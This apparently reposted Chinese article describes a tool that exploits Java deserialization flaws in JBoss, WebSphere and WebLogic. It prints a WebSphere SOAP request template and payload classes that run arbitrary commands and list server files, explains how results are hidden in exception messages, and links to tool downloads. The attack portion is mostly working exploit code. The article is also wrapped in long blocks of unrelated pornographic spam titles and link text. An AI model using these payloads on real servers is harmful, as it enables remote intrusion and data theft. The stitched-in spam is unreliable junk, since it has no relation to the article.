精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Java反序列化集成工具

作者:wooyaa
安全 數據安全
Java反序列化漏洞已經被曝出一段時間了,本人參考了網上大神的放出來的工具,將Jboss、Websphere和weblogic的反序列化漏洞的利用集成到了一起。其實,WebSphere的利用過程也和JBoss差不多,只不過在發送Payload和解析結果的時候多了個Base64編碼(解碼)的過程。

0X00 概述

Java反序列化漏洞已經被曝出一段時間了,本人參考了網上大神的放出來的工具,將Jboss、Websphere和weblogic的反序列化漏洞的利用集成到了一起。其實,WebSphere的利用過程也和JBoss差不多,只不過在發送Payload和解析結果的時候多了個Base64編碼(解碼)的過程。

[[161347]]

本工具暫時支持的功能:

1、本地命令執行并回顯,無須加載外部jar包,支持純內網環境檢測。

2、支持JBoss、WebSphere和Weblogic的反序列化漏洞檢測。

3、支持https數據傳輸。

4、支持文件目錄列表。

0X01 WebSphere的反序列化漏洞利用過程

WebSphere的反序列化漏洞發生的位置在SOAP的通信端口8880,使用的通信協議是https,發送的數據是XML格式的數據。

  1. <?xml version='1.0'encoding='UTF-8'?> 
  2.   <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> 
  3.   <SOAP-ENV:Header xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="8.5.5.1" ns0:JMXMessageVersion="1.2.0" ns0:SecurityEnabled="true" ns0:JMXVersion="1.2.0"> 
  4.   <LoginMethod>BasicAuth</LoginMethod> 
  5.   </SOAP-ENV:Header> 
  6.   <SOAP-ENV:Body> 
  7.   <ns1:getAttribute xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> 
  8.   <objectname xsi:type="ns1:javax.management.ObjectName">Base64(payload)</objectname> 
  9.   <attribute xsi:type="xsd:string">ringBufferSize</attribute> 
  10.   </ns1:getAttribute> 
  11.   </SOAP-ENV:Body> 
  12.   </SOAP-ENV:Envelope> 

將我們構造的執行命令的payload通過base64編碼后放在objectname節點中,通過https發送到服務器端,服務器端調用相應的執行函數,將結果發送給客戶端,同樣的,返回的數據也是經過base64編碼的。WebSphere的Payload和JBoss的基本一致。如下是執行命令的payload。

  1. public RunCommand(String command) throws Exception  
  2.    {  
  3.            Process proc = Runtime.getRuntime().exec(command);  
  4.            BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));  
  5.            StringBuffer sb = new StringBuffer();  
  6.            String line;  
  7.            while ((line = br.readLine()) != null)  
  8.            {  
  9.                sb.append(line).append("\n");  
  10.            }  
  11.            String result = "\r\n\r\n==========" + sb.toString() + "==========\r\n";  
  12.            br.close();  
  13.            Exception e=new Exception(result);  
  14.            throw e;  
  15.    } 

將命令執行結果以字符隔開,這樣在客戶端獲取數據后,可通過split、substring等方法對命令的執行結果進行解析。解析命令的源碼如下:

  1. public static String parseResult(String result)  
  2.    {  
  3.    String tmp=result.split("<faultstring>")[1];  
  4.    String reString=tmp.split("</faultstring>")[0];  
  5.    String resultTmp=new String(Base64.getDecoder().decode(reString));  
  6.    int x1=resultTmp.indexOf("==========")+10;  
  7.    int x2=resultTmp.lastIndexOf("==========")-1;  
  8.    String returnValue="";  
  9.    if(x1>=0&&x2>=0)  
  10.    returnValue=resultTmp.substring(x1, x2).trim();  
  11.    else  
  12.    returnValue=resultTmp;  
  13.    return returnValue;  
  14.    } 

0X02 文件列表讀取

獲取文件列表的功能是通過Java的listRoot和listFiles來實現的,獲取文件和目錄列表的過程和命令執行大概相同。在這我就簡單的描述一下過程:如果傳入方法的是一個空值,那么就通過Files.listRoot獲取根目錄或者驅動器列表,否則,傳入的值是路徑的話,就通過file.listFiles方法獲取目錄下的所有文件和目錄,將獲取到的目錄名放到{}中,將文件名放在[]中,這樣,就方便我們在程序中對獲取到的數據進行解析。

獲取目錄的payload代碼如下:

  1. public GetFileList(String fileName) throws Exception  
  2.     {  
  3.     StringBuilder sb=new StringBuilder();  
  4.     String result=new String();  
  5.     if(fileName.isEmpty())  
  6.     {  
  7.     File[] files=File.listRoots();  
  8.     for(int i=0;i<files.length;i++)  
  9.     {  
  10.     sb.append(files[i].getAbsolutePath()).append(",");  
  11.     }  
  12.     result="{"+sb.toString().substring(0,sb.toString().length()-1)+"}";  
  13.     }  
  14.     else  
  15.     {  
  16.     File file=new File(fileName);  
  17.     StringBuilder dirList=new StringBuilder();  
  18.     StringBuilder fileList=new StringBuilder();  
  19.     if(file.isDirectory())  
  20.     {  
  21.     File[] list=file.listFiles();  
  22.     dirList.append("{");  
  23.     fileList.append("[");  
  24.     for(int i=0;i<list.length;i++)  
  25.     {  
  26.     if(list[i].isDirectory())  
  27.     dirList.append(list[i].getAbsolutePath()).append(",");  
  28.     else  
  29.     fileList.append(list[i].getAbsolutePath()).append(",");  
  30.     }  
  31.     }  
  32.     if(!dirList.toString().isEmpty())  
  33.     sb.append(dirList.toString().substring(0,dirList.toString().length()-1)).append("}");  
  34.     if(!fileList.toString().isEmpty())  
  35.     sb.append(fileList.toString().substring(0,fileList.toString().length()-1)).append("]");  
  36.     result=sb.toString();  
  37.     }  
  38.     result="\r\n\r\n==========\r\n"+result+"\r\n==========\r\n";  
  39.     Exception e=new Exception(result);  
  40.             throw e;  
  41.     } 

解析的時候,先將執行結果分離出來,再對結果base64解碼,再進一步區分目錄和文件,分別添加到界面的目錄樹中。

注:設計時為了美觀,使用了JavaFX來設計界面,運行時需要JDK1.8環境。

程序運行效果如下:

Java反序列化集成工具

 

工具下載地址:http://pan.baidu.com/s/1sjXjsBz 密碼: b423

2016.1.5 工具更新內容:

地址: http://pan.baidu.com/s/1jGSEFFS 密碼: si6t

1.多線程處理任務,解決命令執行過程中界面無法響應的問題

2.[Bug Fix]weblogic console端口改為80時無法獲取數據

3.[Bug Fix]weblogic第一次獲取信息或執行命令響應時間過長的問題

責任編輯:藍雨淚 來源: FreeBuf
反序列化集成工具反序列化漏洞
相關推薦

2022-08-06 08:41:18

序列化反序列化Hessian

2018-03-19 10:20:23

Java序列化反序列化

2011-06-01 15:05:02

序列化反序列化

2009-06-14 22:01:27

Java對象序列化反序列化

2009-08-24 17:14:08

C#序列化

2016-09-21 00:15:27

2009-08-06 11:16:25

C#序列化和反序列化

2023-12-13 13:49:52

Python序列化模塊

2011-05-18 15:20:13

XML

2021-10-20 07:18:50

Java 序列化漏洞

2010-03-19 15:54:21

Java Socket

2011-06-01 14:50:48

2009-08-25 14:24:36

C#序列化和反序列化

2019-11-20 10:07:23

web安全PHP序列化反序列化

2021-11-18 07:39:41

Json 序列化Vue

2012-04-13 10:45:59

XML

2009-09-09 16:10:11

.NET序列化和反序列

2009-08-25 14:43:26

C#序列化和反序列化

2024-09-10 08:28:22

2024-10-07 08:26:53

點贊
收藏

51CTO技術棧公眾號

久久精彩免费视频| 欧美视频在线观看一区二区| 国产女主播一区二区| av大片免费观看| 精品国内自产拍在线观看视频 | 91麻豆国产在线观看| 国产第一区电影| 免费在线观看亚洲| 免费看成人哺乳视频网站| 欧美另类变人与禽xxxxx| 97超碰国产精品| √天堂资源地址在线官网| 国产凹凸在线观看一区二区| 日韩美女在线看| 青娱乐国产在线视频| 国产精品一在线观看| 欧美大肚乱孕交hd孕妇| 91蝌蚪视频在线观看| 欧美xxxx做受欧美88bbw| 欧美国产视频在线| 精品免费一区二区三区蜜桃| av网站免费大全| 日本不卡视频在线| 91精品国产亚洲| 欧美精品videos极品| 精品一区av| 日韩精品一区二区三区第95| 做a视频在线观看| 3d性欧美动漫精品xxxx软件| 五月天网站亚洲| 成人短视频在线看| 国产视频第一区| 91免费精品国自产拍在线不卡| 91天堂在线观看| 日韩欧美一级大片| 亚洲色诱最新| 国外色69视频在线观看| 成年人午夜剧场| 国产精品国产三级国产在线观看 | 亚洲qvod图片区电影| 中文字幕免费高清网站| 国产日韩1区| 久久人91精品久久久久久不卡| 神马久久精品综合| 日本a口亚洲| 亚洲最新av在线| 免费网站在线高清观看| 蜜臀av免费一区二区三区| 精品亚洲一区二区三区| 加勒比精品视频| 老司机成人在线| 亚洲精品mp4| 久久人人爽人人人人片| 香蕉视频一区| 日韩av在线免费观看一区| 日韩精品视频一区二区| 玖玖玖免费嫩草在线影院一区| 欧美精品一区二区在线观看| 亚洲国产精品第一页| 91在线一区| 日韩成人中文字幕在线观看| 黄色国产在线观看| 亚洲理论电影| 在线日韩第一页| 日韩av毛片在线观看| 天天综合国产| 色综合久久精品亚洲国产| 麻豆疯狂做受xxxx高潮视频| 亚洲国产一区二区三区a毛片| 欧美激情综合色| av大片在线免费观看| 性娇小13――14欧美| 国产成人精品国内自产拍免费看| 这里只有精品免费视频| 男男视频亚洲欧美| 91精品视频免费| 韩国av在线免费观看| 91亚洲精品乱码久久久久久蜜桃 | 动漫精品一区二区| av视屏在线播放| 日韩一区中文| 精品乱码亚洲一区二区不卡| 熟女丰满老熟女熟妇| 日韩dvd碟片| 欧美激情亚洲一区| 日韩精品一区不卡| 国产一区二区三区在线观看免费| 春色成人在线视频| 黄色av网站在线免费观看| 中文字幕一区二区三区在线不卡| 人妻互换免费中文字幕| 亚洲wwww| 欧美一级xxx| 91精品国产自产| 婷婷精品进入| 97视频免费在线观看| 在线播放成人av| 成人av网站免费观看| 色播五月综合| 91豆花视频在线播放| 欧美性一级生活| 老司机免费视频| 99久久夜色精品国产亚洲96| 97久久伊人激情网| 91久久精品无码一区二区| 99综合电影在线视频| 亚洲国产精品123| 国产社区精品视频| 在线电影一区二区三区| 五月婷婷综合在线观看| 亚洲天天综合| 国产精品美女视频网站| 神马久久久久久久久久| 国产精品电影一区二区| 久久久久久久久久久福利| 精品国产亚洲一区二区三区| 亚洲人成网站999久久久综合| 黄页网站免费观看| 美女视频黄免费的久久| 你懂的视频在线一区二区| 在线观看男女av免费网址| 欧美天堂一区二区三区| 黄色在线观看av| 最新日韩在线| av资源站久久亚洲| 黄色片网站在线观看| 色婷婷av一区| 久久久久久久久免费看无码 | 中文字幕一区三区| 任你操这里只有精品| 林ゆな中文字幕一区二区| 欧美精品在线免费播放| 888奇米影视| 国产精品视频你懂的| 成人精品视频一区二区| 99re8这里有精品热视频免费 | 极品少妇一区二区三区精品视频| 欧美日韩另类丝袜其他| 免费一二一二在线视频| 亚洲第一在线视频| 久久精品美女视频| 国产成人综合在线播放| 久久久天堂国产精品| 国产精品视频一区视频二区| 日韩中文字幕视频| 91久久久久国产一区二区| 国产精品伦一区二区三级视频| 日日碰狠狠丁香久燥| 国产毛片一区二区三区| 日韩美女视频免费看| 可以直接在线观看的av| 色哟哟在线观看一区二区三区| 日本丰满少妇裸体自慰| 国产欧美日韩一区二区三区在线| 国产在线一区二| sm在线播放| 亚洲美腿欧美激情另类| 无码人妻精品一区二区蜜桃色欲| 久久精品一级爱片| 玩弄japan白嫩少妇hd| 第一会所亚洲原创| 91精品在线观看视频| 成人直播在线| 欧美成人福利视频| 国产精品白浆一区二小说| bt欧美亚洲午夜电影天堂| 日韩欧美视频网站| 免费精品国产| 91久久久在线| 国产第一页在线视频| 亚洲免费视频一区二区| 国产情侣免费视频| 亚洲免费观看高清| 国产一线在线观看| 久久久水蜜桃av免费网站| 日韩福利影院| 日韩精品视频在线看| 国内成人精品视频| 国产毛片av在线| 欧美一级视频精品观看| 久草国产精品视频| 国产欧美一区二区精品仙草咪 | aaa在线视频| 国产精品第一页第二页第三页| 欧美性猛交乱大交| 在线亚洲一区| 中文字幕一区二区三区有限公司| 日韩中文字幕视频网| 欧洲成人免费aa| 久久日韩视频| 精品丝袜一区二区三区| 一二三四区在线| 亚洲mv在线观看| 欧美日韩生活片| 成人精品免费看| 91制片厂毛片| 亚洲国产一区二区三区高清 | 一区二区黄色片| 国产精品资源网站| 欧美日韩在线不卡视频| 久久久久蜜桃| 欧美日本亚洲| 综合成人在线| 国产欧美亚洲精品| 色综合桃花网| 欧美黑人xxxx| 免费高清完整在线观看| 日韩久久精品成人| 国产浮力第一页| 欧美乱妇15p| 国产情侣免费视频| 欧美日韩激情网| 久草视频免费播放| 欧美激情综合在线| 国产肉体xxxx裸体784大胆| 国产一区二区91| 小泽玛利亚视频在线观看| 国产亚洲午夜| 久久国产午夜精品理论片最新版本| 99精品综合| 日韩中文字幕av在线| 亚洲春色h网| 国产精品自拍首页| 一区二区三区四区高清视频| 成人h视频在线| 高清欧美日韩| 国产成人精品日本亚洲专区61| 都市激情国产精品| 色综合老司机第九色激情| 蜜芽在线免费观看| 在线观看日韩视频| 高清av电影在线观看| 亚洲欧美日韩国产中文专区| 天堂在线资源网| 亚洲第一网站免费视频| 囯产精品久久久久久| 91精品国产美女浴室洗澡无遮挡| 在线观看国产精品入口男同| 欧美性受极品xxxx喷水| 天天操天天干天天摸| 日本电影亚洲天堂一区| 无码人妻av一区二区三区波多野| 日韩欧美国产黄色| 97免费在线观看视频| 亚洲高清免费视频| 在线观看 中文字幕| 亚洲线精品一区二区三区八戒| 久久久久久久久久一区二区三区| 亚洲激情校园春色| 男女免费视频网站| 亚洲国产日韩综合久久精品| 日韩女同强女同hd| 狠狠色狠狠色综合日日小说| 日韩在线视频免费播放| 欧美性猛交xxxx免费看漫画 | 女人让男人操自己视频在线观看| 91chinesevideo永久地址| 三级在线观看视频| 国产成人激情小视频| 伦一区二区三区中文字幕v亚洲| 国产免费一区二区三区香蕉精| 日韩精品第二页| 91精品婷婷国产综合久久蝌蚪| 99亚洲乱人伦aⅴ精品| 久久国产一区| 成人在线视频免费观看| 欧美爱爱视频网站| 黄色成人91| 50路60路老熟妇啪啪| 美腿丝袜亚洲一区| 欧美性猛交xx| 91色九色蝌蚪| 国产在线观看免费视频软件| 亚洲激情在线播放| 亚洲 欧美 日韩 综合| 精品婷婷伊人一区三区三| 国产人妖一区二区| 亚洲国产精品国自产拍av秋霞| 国产在线色视频| 欧美成人精品在线观看| 一区二区三区电影大全| 国产日产欧美精品| 极品尤物一区| 亚洲一区三区电影在线观看| 国产精品av一区二区| 午夜精品久久久内射近拍高清| 久久国产精品区| 影音先锋黄色资源| 亚洲国产精品二十页| 久久综合色综合| 欧美性生活影院| 日本毛片在线观看| 色老头一区二区三区在线观看| 超碰在线中文字幕| 国产精品爽黄69| 麻豆精品av| 久久99国产精品一区| 久久成人一区| 无码人妻丰满熟妇啪啪网站| 欧美国产欧美亚州国产日韩mv天天看完整| 麻豆亚洲av熟女国产一区二| 欧美在线不卡视频| 涩涩视频免费看| 另类天堂视频在线观看| 日韩福利一区| 国产精品jizz视频| 99久久久久| 免费激情视频在线观看| 不卡视频一二三四| 在线看的片片片免费| 91福利资源站| 天堂av在线7| 欧美精品成人在线| 亚洲欧美在线人成swag| 欧美日韩在线一二三| 亚洲精品日本| 日本黄色一级网站| 中文字幕一区免费在线观看| 亚洲图片欧美日韩| 日韩高清人体午夜| 搞黄网站在线看| 动漫美女被爆操久久久| 第一社区sis001原创亚洲| 欧美成人精品欧美一级乱| 成人动漫视频在线| 激情综合网五月天| 在线成人高清不卡| 午夜小视频在线| 国产精品亚洲аv天堂网| 国产成人影院| 久久久噜噜噜www成人网| 99精品久久99久久久久| 伊人365影院| 精品国产凹凸成av人网站| 菠萝蜜视频国产在线播放| 国产精品久久久久久久久久ktv| 日韩有码一区| 久久久一本二本三本| 91视频国产资源| 国产精品久免费的黄网站| 日韩精品一区二区三区第95| 中文在线8资源库| 精品一区二区国产| 午夜宅男久久久| 免费在线观看你懂的| 日韩欧美主播在线| 国产小视频在线播放| 国产精品国产三级国产aⅴ浪潮| 精品国产精品| 天天操天天摸天天爽| 中文字幕av一区二区三区免费看| 中文字幕自拍偷拍| 久久精品国产亚洲| 日韩亚洲精品在线观看| 国产一二三四五| 成人永久免费视频| 天天插天天操天天干| 亚洲人成网7777777国产| 秋霞国产精品| 四虎影院一区二区| 福利电影一区二区| 精品小视频在线观看| 日韩av在线最新| 日韩高清在线| 国产精品h视频| 国产凹凸在线观看一区二区| 国产一级做a爱片久久毛片a| 一夜七次郎国产精品亚洲| 亚瑟国产精品| 青青青在线视频播放| 久久婷婷国产综合精品青草 | 天堂а√在线最新版中文在线| 欧美日韩免费高清| 韩国一区二区视频| 国产精品a成v人在线播放| 亚洲天堂免费观看| 自拍偷拍亚洲图片| 欧美不卡在线播放| 国产三级欧美三级| 国产av一区二区三区| 97色在线播放视频| 久久精品国产68国产精品亚洲| 黑人性生活视频| 日韩欧美aⅴ综合网站发布| 麻豆免费在线视频| 久久福利电影| 国产一级精品在线| 午夜婷婷在线观看| 日韩视频精品在线| 欧美韩一区二区| 亚洲天堂av一区二区| 黄色成人在线播放| 麻豆传媒视频在线| 久久综合九色综合久99| 极品美女销魂一区二区三区| 欧美bbbbbbbbbbbb精品| 久久精品成人一区二区三区| 亚洲动漫在线观看| 特种兵之深入敌后| 欧美三级电影网|